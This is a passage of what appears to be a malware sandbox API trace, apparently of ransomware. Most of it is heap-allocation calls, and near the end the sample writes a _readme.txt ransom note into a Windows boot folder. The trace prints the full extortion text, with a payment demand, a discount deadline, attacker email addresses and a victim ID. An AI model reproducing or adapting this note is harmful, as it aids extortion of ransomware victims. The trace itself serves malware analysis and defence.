Size=0x820) returned 0x9c5d1d0 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.350] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.350] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.351] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.354] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0056.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.355] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.355] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.355] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0056.355] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.355] PathFindFileNameW (pszPath="") returned="" [0056.355] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eec8 [0056.355] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75fd0000 [0056.356] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0056.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x3297a68 [0056.356] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3297a68 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0056.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x9c5d1d0 [0056.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.356] FreeLibrary (hLibModule=0x75fd0000) returned 1 [0056.356] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0056.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.356] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0056.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7d00) returned 0x9c82710 [0056.357] lstrcpyW (in: lpString1=0x9c82710, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s" [0056.357] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s", lpString2="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.357] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\_readme.txt" (normalized: "c:\\boot\\zh-hk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.357] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.358] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal 